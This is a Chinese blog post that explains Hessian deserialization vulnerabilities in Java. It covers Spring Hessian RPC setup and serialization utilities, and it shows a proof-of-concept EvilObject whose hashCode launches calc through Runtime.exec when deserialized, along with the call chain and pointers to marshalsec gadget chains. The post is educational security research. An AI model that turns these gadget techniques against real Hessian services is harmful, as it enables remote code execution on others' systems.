『Java安全』反序列化-浅析Hessian反序列化POP链

已于 2022-08-09 16:45:31 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: # 反序列化 文章标签: java web安全 hessian 反序列化 ysoserial
于 2022-07-22 11:48:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/125925629
版权

文章目录

前言

总结自https://javasec.org/java-vuls/Hessian.html

pom.xml

8u111 + Hessian4.0.38

        <!-- https://mvnrepository.com/artifact/com.caucho/hessian -->
        <dependency>
            <groupId>com.caucho</groupId>
            <artifactId>hessian</artifactId>
            <version>4.0.38</version>
        </dependency>

Spring联动Hessian使用

Server端

都是RPC协议,类似rmi,服务需要写接口和接口实现类,然后对外暴露URL

服务接口

package com.example.hessianspring.server;

public interface MyService {
    String hello(String str);
}

服务实现类

实现类需要继承HessianServlet

package com.example.hessianspring.server;

import com.caucho.hessian.server.HessianServlet;

public class MyServiceImpl extends HessianServlet implements MyService {

    @Override
    public String hello(String str) {
        return "hello! " + str;
    }
}

SpringApp

SpringApp启动添加一个bean,注册服务、绑定URL,这里用到HessianServiceExporter

package com.example.hessianspring.server;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import org.springframework.remoting.caucho.HessianServiceExporter;

@SpringBootApplication
public class HessianSpringApplication {

    public static void main(String[] args) {
        SpringApplication.run(HessianSpringApplication.class, args);
    }

    @Bean(name = "/hessian")
    public HessianServiceExporter serviceExporter(){
        HessianServiceExporter exporter = new HessianServiceExporter();
        exporter.setService(new MyServiceImpl());
        exporter.setServiceInterface(MyService.class);
        return exporter;
    }
}

(该类已被弃用
.
在这里插入图片描述

Client端

新建HessianProxyFactory代理工厂,然后调用create在client代理实例化出服务类,就能调用方法了

package com.example.hessianspring.client;

import com.caucho.hessian.client.HessianProxyFactory;
import com.example.hessianspring.server.MyService;

public class Client {
    public static void main(String[] args) throws Exception {
        String url = "http://127.0.0.1:8080/hessian";

        HessianProxyFactory factory = new HessianProxyFactory();
        MyService myService = (MyService) factory.create(MyService.class, url);
        System.out.println(myService.hello("hahaha"));
    }
}

手动序列化和反序列化

Hessian提供了方法可以完成最简单的序列化和反序列化功能,自行封装方法,下面采用Hessian2Output

给Hessian2Output传入一个输出流,然后调用writeObject方法会把对象写入到输出流中,最后转换成bytes字节流即可

package com.example.hessianspring.utils;

import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;

public class SerializableUtil {

    public static byte[] manualSerialize(Object obj){
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        Hessian2Output output = new Hessian2Output(baos);
        byte[] bytes = null;

        try {
            output.writeObject(obj);
            output.flush();
            bytes = baos.toByteArray();
        }catch (Exception e){
            e.printStackTrace();
        }
        return bytes;
    }

    public static Object manualUnserialize(byte[] bytes){
        Object obj = null;
        try {
            ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
            Hessian2Input input = new Hessian2Input(bais);
            obj = input.readObject();
        }catch (Exception e){
            e.printStackTrace();
        }
        return obj;
    }
}

能序列化的类

在序列化的时候,Hessian支持实现Serializable接口的类,如果没有实现Serializable则抛错
在这里插入图片描述

序列化没有实现Serializable的类

上一步抛错只是在序列化的时候,而反序列化的时候没有,同时也有参数_isAllowNonSerializable开启就能序列化没有实现Serializable的类

在这里插入图片描述
需要序列化恶意对象时,就可以在Hessian2Output类打开这个参数从而实现序列化所有类了,无需反射,直接Hessian2Output自带方法可以修改

在这里插入图片描述
测试成功序列化

package com.example.hessianspring.test;

import com.example.hessianspring.utils.NonSerializableUtil;

public class NonSerializableTest {
    public static void main(String[] args){
        try {
            NonSerialize n = new NonSerialize("a");
            byte[] serialize = NonSerializableUtil.manualSerialize(n);
            NonSerialize obj = (NonSerialize)NonSerializableUtil.manualUnserialize(serialize);
            System.out.println(obj.a);
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}

class NonSerialize{
    String a;

    public NonSerialize(String a) {
        this.a = a;
    }
}

反序列化漏洞原理

在反序列化时,会通过标志位判断对象的类型,然后调用对应类的反序列化器

对应方法在SerializerFactory.loadDeserializer()

在这里插入图片描述

对于Map类:会调用反序列化器的readMap方法进行反序列化操作,默认反序列化出来的是HashMap类

在这里插入图片描述
具体会调用到Map的put方法写入键值对

在这里插入图片描述
HashMap的put方法就会调用键自身的hashCode方法来判断是否有重复,进而就造成了漏洞风险,这里不再赘述

对于TreeMap还有equals和compareTo方法可以触发

触发点总结

  • Map类的键
  • 入口hashCode/equals/compareTo

另外就是不能有transient修饰的属性,不会序列化

测试demo

工具类

package com.example.hessianspring.utils;

import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;

public class NonSerializableUtil {

    public static byte[] manualSerialize(Object obj){
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        Hessian2Output output = new Hessian2Output(baos);
        byte[] bytes = null;

        try {
            output.getSerializerFactory().setAllowNonSerializable(true);
            output.writeObject(obj);
            output.flush();
            bytes = baos.toByteArray();
        }catch (Exception e){
            e.printStackTrace();
        }
        return bytes;
    }

    public static Object manualUnserialize(byte[] bytes){
        Object obj = null;
        try {
            ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
            Hessian2Input input = new Hessian2Input(bais);
            obj = input.readObject();
        }catch (Exception e){
            e.printStackTrace();
        }
        return obj;
    }
}

主类

重写个hashCode测试一下

package com.example.hessianspring.test;

import com.example.hessianspring.utils.NonSerializableUtil;

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

public class ManualRCETest {
    public static void main(String[] args){
        Map map = new HashMap();
        map.put(new EvilObject(), 1);
        byte[] b = NonSerializableUtil.manualSerialize(map);
        NonSerializableUtil.manualUnserialize(b);
    }
}

class EvilObject {
    @Override
    public int hashCode() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }

        return 0;
    }
}

在这里插入图片描述

POP链

hashCode:22, EvilObject (com.example.hessianspring.test)
hash:338, HashMap (java.util)
put:611, HashMap (java.util)
readMap:114, MapDeserializer (com.caucho.hessian.io)
readMap:538, SerializerFactory (com.caucho.hessian.io)
readObject:2110, Hessian2Input (com.caucho.hessian.io)

marshalsec利用链

五条,具体看marshalsec源码

在这里插入图片描述

ROME二次反序列化

hfctf2022-ezchain,ROME1.7不出网,根据y4师傅的研究可以用java/security/SignedObject.java来完成二次反序列化

参考

marshalsec.pdf
https://javasec.org/java-vuls/Hessian.html

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://ho1aas.blog.csdn.net/article/details/125925629
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
专栏目录
Hessian 反序列化RCE漏洞复现
0xSec
12-29 2450
Hessian是二进制的web service协议,官方对Java、Flash/Flex、Python、C++、.NET C#等多种语言都进行了实现。Hessian和Axis、XFire都能实现web service方式的远程方法调用,区别是Hessian是二进制协议,Axis、XFire则是SOAP协议,所以从性能上说Hessian远优于后两者,并且HessianJAVA使用方法非常简单。它使用Java语言接口定义了远程对象,集合了序列化/反序列化和RMI功能。Hessian是一个轻量级的RPC框架。
Hessian 反序列化及相关利用
晓得哥的博客
02-29 2372
作者:Longofo@知道创宇404实验室 时间:2020年2月20日 原文地址:https://paper.seebug.org/1131/#_2 前不久有一个关于Apache Dubbo Http反序列化漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apa...
Javaweb安全——Hessian 反序列化
weixin_43610673的博客
02-03 1976
Hessian类似于RMI也是一种RPC(Remote Produce Call)的实现。基于HTTP协议,使用二进制消息进行客户端和服务器端交互。Hessian 自行定义了一套自己的储存和还原数据的机制。对 8 种基础数据类型、3 种递归类型、ref 引用以及 Hessian 2.0 中的内部引用映射进行了相关定义。这样的设计使得 Hassian 可以进行跨语言跨平台的调用。
Apache Dubbo Hessian-Lite 教程
最新发布
gitblog_00538的博客
08-07 932
Apache Dubbo Hessian-Lite 教程 dubbo-hessian-liteHessian Lite for Apache Dubbo项目地址:https://gitcode.com/gh_mirrors/du/dubbo-hessian-lite 项目介绍 Apache Dubbo Hessian-Lite 是一个专门为 Apache Dubbo 微服务框架设计的轻量级序列...
Hessian 反序列化及XXL-JOB
zkaqlaoniao的博客
11-29 1208
我们经常在CTF里见到Java反序列化的题,而如何从CTF过渡到实战中是一个坎儿,今天就说一次在实战中遇到的不出网Hessian反序列化问题。文章所有内容无敏感信息,均为本地环境,只做思路分享。
Hessian 序列化,反序列
u014646588的博客
07-11 570
Java对象转换为字节序列的过程称为对象的序列化。 把字节序列恢复为Java对象的过程称为对象的反序列化。对象的序列化主要有两种用途: 1)数据介质的存储 2)数据网络传输Hessian 实现运程通信的 Library Hessian 是由 caucho 提供的一个基于 binary-RPC 实现的远程通讯 library 。1 、是基于什么协议实现的? 基于 Binary-RPC 协议
Hessian 序列化、反序列化
字节跳动技术团队官方博客
08-05 5070
动手点关注干货不迷路????背景问题和思考:序列化参数有枚举属性,序列化端增加一个枚举,能否正常反序列化?序列化子类,它和父类有同名参数,反序列化时,同名参数能否能正常赋值?序列化对象增加参数,反序列化类不增加参数,能否正常反序列化?用于序列化传输的属性,用包装器比较好,还是基本类型比较好?为什么要使用序列化和反序列化程序在运行过程中,产生的数据,不能一直保存在内存中,需要暂...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
-a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode...
S25-hessian反序列化1
08-03
【S25-Hessian反序列化1】是一个关于JavaHessian序列化库的讨论,主要涉及Hessian与原生Java序列化的差异以及在Spring框架中的应用。Hessian是一种二进制序列化协议,旨在提高远程过程调用(RPC)的效率。与原生Java...
浅谈Java序列化和hessian序列化的差异
08-29
Java序列化和Hessian序列化的差异 Java序列化和Hessian序列化是两种常用的序列化机制,它们都可以将对象转换为字节流,以便在网络上传输。但是,两者之间有着很大的差异,今天我们就来比较一下它们的实现机制和特点...
hessian学习基础篇——序列化和反序列化
05-26
Hessian反序列化过程接收二进制流,并根据其定义解析成Java对象。这个过程对于跨语言通信特别有用,因为它能将一个语言的对象转换为另一种语言可以理解的格式。 在实际应用中,Hessian常用于构建轻量级的Web服务,...
序列化工具-hessian-序列化和反序列化用法
撸起袖子加油干
01-14 1342
一、环境依赖: <dependency> <groupId>com.caucho</groupId> <artifactId>hessian</artifactId> <version>4.0.37</version> </dependency> 二、序列化&反序列化: public interface ISerializer { <T> T deseri.
java hessian序列化与反序列化_Hessian 序列化和反序列化实现
weixin_36262567的博客
02-24 570
先聊聊 Java的序列化,Java官方的序列化和反序列化的实现被太多人吐槽,这得归于Java官方序列化实现的方式。1、Java序列化的性能经常被吐槽。2、Java官方的序列化后的数据相对于一些优秀的序列化的工具,还是要大不少,比如probuf,这大大影响存储和传输的效率。3、Java序列化一定需要实现Serializable接口4、Java序列化的serialVersionUID 也是个大坑另外...
java hessian序列化与反序列化_JAVA基础4---序列化和反序列化深入整理(Hessian序列化)...
weixin_29268267的博客
02-19 1229
一、Hessian序列化用法1、maven依赖com.cauchohessian4.0.382、序列化和反序列化1 /**Hessian序列化*/2 public static byte[] hessianSerialize(Object object){3 Hessian2Output oo = null;4 byte[] result = null;5 ...
Java Hessian反序列化漏洞
Keepb1ue的博客
01-10 4394
Java Hessian反序列化漏洞复现
Hessian 序列化和反序列化实现
weixin_30877181的博客
05-11 333
先聊聊 Java的序列化,Java官方的序列化和反序列化的实现被太多人吐槽,这得归于Java官方序列化实现的方式。 1、Java序列化的性能经常被吐槽。2、Java官方的序列化后的数据相对于一些优秀的序列化的工具,还是要大不少,比如probuf,这大大影响存储和传输的效率。3、Java序列化一定需要实现Serializable接口4、Java序列化的serialVersionUID 也是个大坑...
java 命令行 反序列化_从反序列化到命令执行 – Java 中的 POP 执行
weixin_35775608的博客
02-16 434
Author:RickGray (知道创宇404安全实验室)Date: 2015-11-25一、什么是序列化序列化常用于将程序运行时的对象状态以二进制的形式存储于文件系统中,然后可以在另一个程序中对序列化后的对象状态数据进行反序列化恢复对象。简单的说就是可以基于序列化数据实时在两个程序中传递程序对象。1. Java 序列化示例上面是一段简单的 Java 反序列化应用的示例。在第一段代码里面,程序...
使用Hessian进行序列化和反序列化
许我笔墨三千绘你绝世倾城
05-28 1830
这东西没啥可说的直接上代码: /** * 这是讲object序列化 * @param obj * @return */ public static byte[] serialization(Object obj){ if(obj==null){ throw new NullPointerException(); } ByteArrayOutputStream o...
Java序列化详解:安全与优化
- 其他库的序列化实现:例如Hessian和MINA提供了更高效的序列化和反序列化方案。 - 工作中需要注意的问题:确保序列化安全,避免序列化不安全的对象,防止反序列化攻击。 4. **序列化与反序列化流程** - 对象 ->...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值